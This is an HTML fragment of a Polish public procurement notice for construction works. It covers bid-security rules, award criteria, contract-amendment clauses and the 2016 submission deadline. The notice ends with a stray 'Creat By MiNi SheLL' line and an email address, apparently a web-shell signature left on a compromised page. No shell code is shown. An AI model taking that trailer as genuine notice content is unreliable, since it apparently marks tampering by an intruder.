             - Wykonawca w odpowiedzi na wezwanie do uzupełnienia oświadczeń, dokumentów              
                lub pełnomocnictw o którym mowa w art. 26 ust. 3 i 3a Ustawy Pzp., z przyczyn 
                leżących po jego stronie nie złożył oświadczeń lub dokumentów potwierdzających  
                okoliczności, o których mowa w art. 25 ust. 1, oświadczenia, o którym mowa w 
                art.25a ust. 1 , pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której 
                mowa w art. 87 ust. 2 pkt. 3, co spowodowało brak możliwości wybrania oferty 
                złożonej przez Wykonawcę jako najkorzystniejszej.        
          -   Wykonawca, którego ofertę wybrano odmówił podpisania umowy na warunkach 
                określonych w ofercie , 
           -   Wykonawca, którego ofertę wybrano nie wniósł zabezpieczenia należytego 
                wykonania umowy, 
           -  zawarcie umowy, z Wykonawcą, którego ofertę wybrano, stało się niemożliwe z 
                przyczyn leżących po stronie Wykonawcy;
    
5.  Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze  
      najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, 
      którego oferta zostanie wybrana jako najkorzystniejsza. 
6.   Wykonawcy , którego oferta zostanie wybrana jako najkorzystniejsza Zamawiający   zwróci 
      wadium niezwłocznie po zawarciu umowy oraz wniesieniu zabezpieczenia należytego 
     wykonania umowy.
7.  Zamawiający zwróci niezwłocznie wadium  wraz z odsetkami na wniosek Wykonawcy,                         
      który wycofał ofertę przed terminem składania ofert.
8.  Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie  
      Wykonawcy, a oferta jego podlegać będzie odrzuceniu.
9. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wadium 
      (w każdej z dopuszczalnych form) może być wniesione przez jednego, kilku lub
      wszystkich Wykonawców, pod warunkiem, iż łączna wysokość wniesionego wadium   
      odpowiadać będzie wymaganej kwocie. W takim przypadku składając wadium należy  
      wskazać w imieniu kogo i tytułem jakiego postępowania jest wnoszone.
10.Wykonawca zabezpiecza ofertę wymaganą kwotą wadium na okres 30 dni licząc od daty 
     upływu terminu składania ofert.


</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br />
                  z kilkoma wykonawcami
                <br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>80</td></tr><tr><td>skrócenie terminu realizacji</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zmiana istotnych postanowień niniejszej Umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, jest dopuszczalna  w szczególnie uzasadnionych przypadkach, na zasadach wskazanych ust. 2 -9.
2.	Zmiana może obejmować:
1)	zmiany wprowadzone przez Zamawiającego polegające w szczególności na:
	wykonaniu rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji projektowej inwestycji, zmiana taka może być spowodowana pojawieniem się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót. Każdorazowo zgodę  na taką zmianę  musi wyrazić projektant sprawujący nadzór autorski,
2)	pominięciu/ rezygnacji z jakiejkolwiek części robót ( jednak bez prawa zlecenia jej osobom trzecim),
3)	zmiana w kolejności i terminach wykonywania Robót, w tym końcowego terminu wykonania Umowy, wymuszone okolicznościami niedającymi się wcześniej przewidzieć w szczególności wynikającymi ze zmian umów z podwykonawcami lub dalszymi podwykonawcami,
4)	zastąpienie zakresu planowanych do wykonania Robót innym zakresem Robót przy zachowaniu wymogów jakościowych oraz wymogu zgodności z celem i zasadami realizacji umowy,
5)	Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczność wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową, w sytuacji gdy wykonanie tych robót zamiennych będzie niezbędne do prawidłowego tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru przepisami wykonania przedmiotu umowy, zgłoszonych przez Kierownika Budowy lub Inspektora Nadzoru. Przed podjęciem decyzji przez Zamawiającego o wykonaniu robót zamiennych, Wykonawca będzie jednak zobowiązany do przedłożenia kosztorysu zamiennego na rozwiązania zamienne. Podstawą do wykonania rozwiązań/ robót zamiennych niezbędny jest protokół konieczności, podpisany przez Zamawiającego i Wykonawcę lub ich upoważnionych przedstawicieli,
6)	w szczególnie uzasadnionych przypadkach zmianę części zamówienia planowanej do powierzenia podwykonawcom ( w stosunku do części wskazanych w Formularzu Oferty)/ zmianę zakresu robót planowanych do powierzenia podwykonawcom, lub zmianę podwykonawcy, przy czym jeżeli ta zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 22a ust. 1 , w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest zobowiązany wykazać Zamawiającemu iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia,
7)	Jeżeli powierzenie podwykonawcy wykonania części zamówienia na roboty budowlane lub usługi następuje w trakcie jego realizacji, Wykonawca na żądanie zamawiającego przedstawia oświadczenie , o którym mowa w art. 25 ust. 1 lub oświadczenia lub dokumenty potwierdzające brak podstaw wykluczenia wobec tego podwykonawcy.

8)	zmiany wynikające z innych przyczyn zewnętrznych niezależnych od Wykonawcy lub Zamawiającego skutkujące niemożnością wykonywania robót przez Wykonawcę lub wykonywania innych czynności przewidzianych Umową przykładowo przez;
	działania osób trzecich ( np. właściwych instytucji, organów, w tym instytucji współfinansującej inwestycję,
	wystąpienie warunków atmosferycznych uniemożliwiających prawidłowe wykonanie robót , stanowiących przedmiot zamówienia zgodnie z technologią właściwą do ich wykonania , wynikającą z norm, technologii wykonania robót, opracowań techniczno- budowlanych lub z innych przepisów prawa, określających warunki atmosferyczne wymagane do prawidłowego wykonania tych robót , jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które odpowiedzialność ponosi Wykonawca. W takim przypadku termin wykonania umowy może ulec przedłużeniu odpowiednio o ilość dni, w których wystąpiły warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót,
	koniecznością podjęcia robót dodatkowych ( w ramach odrębnego zamówienia), niezbędnych do prawidłowej realizacji Umowy,
	wystąpienie siły wyższej uniemożliwiającej prawidłowe prowadzenie robót- o ilość dni jej trwania oraz/lub ilość dni niezbędnych do usunięcia skutków zdarzeń będących wynikiem siły wyższej.
9)	zmiany specjalistów,
10)	zmiany wysokości należnych podatków i opłat w szczególności zmiany stawki podatku VAT,
11)	inną okolicznością prawną, ekonomiczną lub techniczną skutkującą niemożliwością wykonania lub nienależytym wykonaniem Umowy zgodnie z SIWZ,
3.	Zmiany mogą być wprowadzone jedną z następujących metod:
1)	Wykonawca może zaproponować Zmianę, przez złożenie pisemnej propozycji zmian, które zdaniem Wykonawcy w razie przyjęcia pozwolą skrócić okres realizacji umowy lub obniża  koszt realizacji umowy lub w inny sposób będą korzystne dla Zamawiającego,
2)	Zamawiający może przedłożyć propozycję zmian, jeżeli ich wprowadzenie jest konieczne dla prawidłowej realizacji umowy , które w razie przyjęcia pozwolą skrócić okres realizacji Umowy lub obniżą koszty realizacji Umowy lub w inny sposób będą korzystne dla Zamawiającego  lub jeżeli konieczność ich wprowadzenia wynika ze zmiany prawa lub ze zmiany okoliczności, której nie można było przewidzieć w chwili zawarcia Umowy.
4.	Każda ze stron przedkładając drugiej stronie propozycję zmian spełniającą wymogi określone w ust. 3, wraz z tą propozycją przedłoży:
1)	opis proponowanych zmian i harmonogram wykonania zmian,

5.	Po otrzymaniu propozycji, Wykonawca albo Zamawiający, w porozumieniu z Inspektorem Nadzoru, ( w zależności od przypadku) w terminie 14 dni zatwierdzi bądź odrzuci otrzymaną propozycję zmiany, bądź w tym terminie wystąpi do strony występującej z propozycją zmian przesyłając zmodyfikowaną propozycją zmian spełniającą wymogi opisane w ust. 4.
6.	W przypadku upływu terminu podanego w ust. 5 traktuje się, iż propozycja wprowadzenia zmian została odrzucona.
7.	Do przesłanych zmodyfikowanych propozycji zmian mają zastosowanie postanowienia ust. 5-6.
8.	W przypadku przyjęcia propozycji zmian wchodzą one w życie pod warunkiem objęcia ich pisemnym aneksem.

9.	Zmiana Umowy dokonana z naruszeniem postanowień ust. 1-8 jest nieważna.
10.	Nie stanowi zmiany umowy w rozumieniu art.11 ustawy Praw zamówień publicznych :
a)	zmiana danych osobowych związanych z obsługą administracyjno- organizacyjną umowy,
b)	zmiana danych teleadresowych, osób reprezentujących strony lub oznaczenia strony umowy- wynikających ze zmiany stanu faktycznego albo prawnego.
11.	Zmiana umowy może nastąpić na pisemny umotywowany wniosek jednej ze stron , za zgodą drugiej strony umowy, na podstawie aneksu do umowy.
12.Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może 
     wyrazić zgodę, nie stanowią jednocześnie zobowiązania do wyrażenia tej zgody.
	
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 28/10/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Zadanie finansowane jest z Programu Rozwoju Regionalnego Infrastruktury Sportowej.</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com